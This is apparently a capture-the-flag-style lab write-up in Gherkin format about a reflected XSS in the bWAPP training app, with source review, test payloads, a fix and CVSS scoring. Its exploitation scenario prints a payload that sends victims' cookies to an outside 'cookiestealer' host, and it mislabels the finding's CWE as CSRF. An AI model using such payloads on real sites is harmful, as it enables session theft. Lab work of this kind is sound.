## Version 1.4.1
## language: en

Feature:
  TOE:
    bWAPP
  Category:
    Cross Site Scripting
  Location:
    http://bwapp/xss_ajax_1-2.php - title (Parameter)
  CWE:
    CWE-352: Cross-Site Request Forgery (CSRF)
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Execute JS code in the victims browser
  Recommendation:
    Sanitize user input

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
    | beebox                | 1.6       |
  TOE information:
    Given I am running bWAPP on a beebox VM via VirtualBox on http://bwapp

  Scenario: Normal use case
    Given I go to bwapp/xss_ajax_1-1.php
    Then I see a field to search for movies
    Then I input a movie title
    And I get the response
    """
    Yes! We have that movie...
    """

  Scenario: Static detection
  Input isn't sanitized
    When I look at the code in bwapp/xss_ajax_1-2.php
    """
    55  if(isset($_GET["title"]))
    56  {
    57
    58      // Creates the movie table
    59      $movies = array("CAPTAIN AMERICA", "IRON MAN", "SPIDER-MAN", "THE IN
    CREDIBLE HULK", "THE WOLVERINE", "THOR", "X-MEN");
    60
    61      // Retrieves the movie title
    62      $title = $_GET["title"];
    63
    64      // Generates the XML output
    65      header("Content-Type: text/xml; charset=utf-8");
    66
    67      // Generates the XML header
    68      echo "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>"
    ;
    69
    70      // Creates the <response> element
    71      echo "<response>";
    72
    73      // Generates the output depending on the movie title received from t
    he client
    74      if(in_array(strtoupper($title), $movies))
    75          echo "Yes! We have that movie...";
    76      else if(trim($title) == "")
    77          echo "HINT: our master really loves Marvel movies :)";
    78      else
    79          echo $title . "??? Sorry, we don't have that movie :(";
    80
    81      // Closes the <response> element
    82      echo "</response>";
    83  }
    """
    Then I can see it returns the title parameter directly
    Then I know it's vulnerable to XSS

  Scenario: Dynamic detection
  Triggering an alert
    Given I go to "http://bwapp/xss_ajax_1-2.php"
    And I input "&lt;img src=# onerror=alert(1)&gt;" in the search field
    Then I get an alert in my browser (evidence)[alert.png]
    Then I know the page is vulnerable to XSS

  Scenario: Exploitation
  Steal the user's cookies
    Given i use social engineering to trick a user into searching
    """
    &lt;img src=# onerror=document.location='http://myserver/cookiestealer.php
    ?c='+document.cookie;&gt;
    """
    Then they get redirected to my cookie stealer site
    And I get their session cookies

  Scenario: Remediation
  Sanitize user input
    Given I have patched the code as follows
    """
    55  if(isset($_GET["title"]))
    56  {
    57
    58      // Creates the movie table
    59      $movies = array("CAPTAIN AMERICA", "IRON MAN", "SPIDER-MAN", "THE IN
    CREDIBLE HULK", "THE WOLVERINE", "THOR", "X-MEN");
    60
    61      // Retrieves the movie title
    62      $title = $_GET["title"];
    63
    64      // Generates the XML output
    65      header("Content-Type: text/xml; charset=utf-8");
    66
    67      // Generates the XML header
    68      echo "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>"
    ;
    69
    70      // Creates the <response> element
    71      echo "<response>";
    72
    73      // Generates the output depending on the movie title received from t
    he client
    74      if(in_array(strtoupper($title), $movies))
    75          echo "Yes! We have that movie...";
    76      else if(trim($title) == "")
    77          echo "HINT: our master really loves Marvel movies :)";
    78      else
    79          echo htmlspecialchars($title, ENT_QUOTES, "UTF-8") . "??? Sorry,
    we don't have that movie :(";
    80
    81      // Closes the <response> element
    82      echo "</response>";
    83  }
    """
    Then I can conclude the vulnerability is fixed

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.1/10 (High) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.6/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.6/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    systems/bwapp/352-cross-site-request
      Given I trigger the XSS wit a payload that redirects to my CSRF
      Then I can reset the user's secret from there
